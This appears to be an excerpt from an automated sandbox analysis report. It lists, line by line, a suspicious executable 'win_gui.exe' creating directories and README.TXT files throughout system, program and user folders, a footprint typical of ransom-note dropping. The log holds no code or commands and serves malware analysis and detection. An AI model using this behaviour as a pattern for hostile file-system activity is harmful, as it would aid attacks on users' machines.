Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\videos\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\assets\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\search-summary\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\search-summary\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\send-for-sign\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\send-for-sign\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\send-for-sign\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\signatures\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\signatures\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\signatures\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sign-services-auth\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sign-services-auth\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sign-services-auth\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\task-handler\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\task-handler\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\task-handler\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\tracked-send\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\tracked-send\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\tracked-send\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\walk-through\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\walk-through\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\walk-through\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\uss-search\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\uss-search\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win-scrollbar\themes\dark\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ar-ae\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ca-es\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\cs-cz\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\da-dk\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\de-de\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\en-ae\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\en-gb\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\en-il\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\es-es\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\eu-es\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\fi-fi\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\fr-fr\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\fr-ma\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\he-il\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\hr-hr\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\hu-hu\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\it-it\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ja-jp\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ko-kr\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\nb-no\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\nl-nl\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\pl-pl\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\pt-br\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ro-ro\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\root\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ru-ru\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\sk-sk\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\sl-si\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\sl-sl\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\sv-se\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\tr-tr\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\uk-ua\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\zh-cn\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\zh-tw\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ar-ae\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ca-es\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\cs-cz\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\da-dk\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\de-de\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\en-ae\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\en-gb\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\en-il\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\es-es\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\eu-es\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\fi-fi\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\fr-fr\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\fr-ma\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\he-il\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\hr-hr\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\hu-hu\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\it-it\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ja-jp\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ko-kr\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\nl-nl\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\nb-no\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\pl-pl\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\pt-br\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ro-ro\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\root\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ru-ru\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\sk-sk\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\sl-si\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\sl-sl\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\sv-se\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\tr-tr\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\uk-ua\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\zh-cn\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\zh-tw\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\ar-ae\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\ca-es\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: Y:\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: Z:\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\$WinREAgent\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Recovery\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: Z:\Recovery\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\$WinREAgent\Scratch\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Microsoft Office 15\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Uninstall Information\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\comebadyjeztpncpyfirclwbatysmsxytuegipyfhokwjetyopojcacxlzycfs\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\jdownloader\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\mozilla maintenance service\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\msecache\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: Y:\EFI\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\Default\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\Public\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Microsoft Office 15\ClientX64\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\7-Zip\Lang\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: Z:\Recovery\WindowsRE\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\mozilla maintenance service\logs\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\jdownloader\config\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\Office16\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\PackageManifests\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\Updates\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Aut2Exe\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\AutoItX\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\7-Zip\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Examples\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Extras\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Icons\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\SciTE\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\msecache\OfficeKMS\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\.ms-ad\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\3D Objects\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Contacts\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Desktop\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Documents\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Downloads\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Favorites\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Links\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Music\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\OneDrive\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Pictures\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Recent\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Saved Games\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Searches\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Videos\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\Default\Desktop\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\Default\Documents\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\Default\Downloads\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\Default\Favorites\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\Default\Links\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\Default\Music\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\Default\OneDrive\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\Default\Pictures\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\Default\Saved Games\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\Default\Videos\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\Public\AccountPictures\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\Public\Desktop\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\Public\Documents\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\Public\Downloads\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\Public\Libraries\README.TXTJump to behavior
